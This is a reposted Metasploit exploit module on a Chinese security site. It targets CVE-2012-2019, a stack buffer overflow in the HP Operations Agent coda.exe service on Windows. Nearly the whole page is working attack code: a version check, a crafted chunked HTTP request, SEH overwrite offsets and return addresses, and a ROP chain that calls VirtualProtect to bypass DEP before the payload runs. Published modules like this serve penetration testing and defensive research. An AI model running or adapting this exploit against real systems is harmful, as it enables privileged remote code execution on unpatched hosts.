首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
来源:http://www.metasploit.com 作者:vazquez 发布时间:2012-10-29  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize
		super(
			'Name'        => 'HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability in HP Operations Agent for
				Windows. The vulnerability exists in the HP Software Performance Core Program
				component (coda.exe) when parsing requests for the 0x34 opcode. This module has
				been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
				Windows 2003 SP2 (DEP bypass).

				The coda.exe components runs only for localhost by default, network access must be
				granted through its configuration to be remotely exploitable. On the other hand it
				runs on a random TCP port, to make easier reconnaissance a check function is
				provided.
			},
			'Author'      => [
				'Luigi Auriemma', # Vulnerability discovery
				'juan vazquez' # Metasploit module
			],
			'Platform'    => 'win',
			'References'  =>
				[
					[ 'CVE', '2012-2019' ],
					[ 'OSVDB', '83673' ],
					[ 'BID', '54362' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-114/' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
					'DisableNops'    => true
				},
			'Targets'     =>
				[
					[ 'HP Operations Agent 11.00 / Windows XP SP3',
						{
							'Ret'    => 0x100e79eb, # ppr from OvSecCore.dll
							'Offset' => 2084
						}
					],
					[ 'HP Operations Agent 11.00 / Windows 2003 SP2',
						{
							'Ret'       => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll
							'Offset'    => 2084,
							'RopOffset' => 36
						}
					]
				],
			'DefaultTarget'  => 1,
			'Privileged'     => true,
			'DisclosureDate' => 'Jul 09 2012'
		)

	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V")[0].to_i
	end

	def nop
		return make_nops(4).unpack("V")[0].to_i
	end

	def check

		res = ping

		if not res
			return Exploit::CheckCode::Unknown
		end

		if res !~ /HTTP\/1\.1 200 OK/
			return Exploit::CheckCode::Unknown
		end

		if res =~ /server:.*coda 11.(\d+)/
			minor = $1.to_i
			if minor < 2
				return Exploit::CheckCode::Vulnerable
			else
				return Exploit::CheckCode::Safe
			end
		end

		if res =~ /server:.*coda/
			return Exploit::CheckCode::Detected
		end

		return Exploit::CheckCode::Safe

	end

	def ping

		ping_request = <<-eos
Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1
cache-control: no-cache
connection: close
content-length: 0
content-type: application/octetstream
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/
user-agent: BBC 11.00.044; coda unknown version

		eos

		connect
		sock.put(ping_request)
		res = sock.get_once(-1, 1)
		disconnect

		return res

	end

	def exploit

		peer = "#{rhost}:#{rport}"

		print_status "#{peer} - Ping host..."
		res = ping
		if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/
			print_error("#{peer} - Host didn't answer correctly to ping")
			return
		end

		connect

		http_headers = <<-eos
GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1
cache-control: no-cache
content-type: application/octetstream
expect: 100-continue
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/
transfer-encoding: chunked
user-agent: BBC 11.00.044;  14

		eos

		print_status("#{peer} - Sending HTTP Expect...")
		sock.put(http_headers)
		res = sock.get_once(-1, 1)
		if not res or res !~ /HTTP\/1\.1 100 Continue/
			print_error("#{peer} - Failed while sending HTTP Expect Header")
			return
		end

		coda_request = [
			0x0000000e,
			0xffffffff,
			0x00000000,
			0x00000034, # Operation 0x8c
			0x00000002,
			0x00000002
		].pack("N*")

		if target.name =~ /Windows XP/
			bof = rand_text(target['Offset'])
			bof << generate_seh_record(target.ret)
			bof << payload.encoded
			bof << rand_text(4000) # Allows to trigger exception
		else # Windows 2003
			rop_gadgets =
				[
					0x77bb2563, # POP EAX # RETN
					0x77ba1114, # <- *&VirtualProtect()
					0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
					junk,
					0x77bb0c86, # XCHG EAX,ESI # RETN
					0x77bc9801, # POP EBP # RETN
					0x77be2265, # ptr to 'push esp #  ret'
					0x77bb2563, # POP EAX # RETN
					0x03C0990F,
					0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
					0x77bb48d3, # POP EBX, RET
					0x77bf21e0, # .data
					0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
					0x77bbfc02, # POP ECX # RETN
					0x77bef001, # W pointer (lpOldProtect) (-> ecx)
					0x77bd8c04, # POP EDI # RETN
					0x77bd8c05, # ROP NOP (-> edi)
					0x77bb2563, # POP EAX # RETN
					0x03c0984f,
					0x77bdd441, # SUB EAX, 03c0940f
					0x77bb8285, # XCHG EAX,EDX # RETN
					0x77bb2563, # POP EAX # RETN
					nop,
					0x77be6591, # PUSHAD # ADD AL,0EF # RETN
				].pack("V*")
			bof = Rex::Text.pattern_create(target['RopOffset'])
			bof << rop_gadgets
			bof << payload.encoded
			my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
			bof << rand_text(target['Offset'] - my_payload_length)
			bof << generate_seh_record(target.ret)
			bof << rand_text(4000) # Allows to trigger exception
		end

		coda_request << [bof.length].pack("n")
		coda_request << bof

		http_body = coda_request.length.to_s(16)
		http_body << "\x0d\x0a"
		http_body << coda_request
		http_body << "\x0d\x0a\x0d\x0a"

		print_status("#{peer} - Triggering overflow...")
		sock.put(http_body)

		disconnect
	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Paint 5.1 Memory Cor
·HP Operations Agent Opcode cod
·ManageEngine Security Manager
·Microsoft Windows Help program
·Joomla Component com_jce remot
·hMailServer 5.3.3 IMAP Remote
·Aladdin Knowledge System Ltd -
·Aladdin Knowledge System Ltd.
·RealPlayer 15.0.6.14(.3g2) Wri
·Microsoft Office professional
·Google SketchUp 8 - Stack Base
·Aladdin Knowledge System Ltd C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved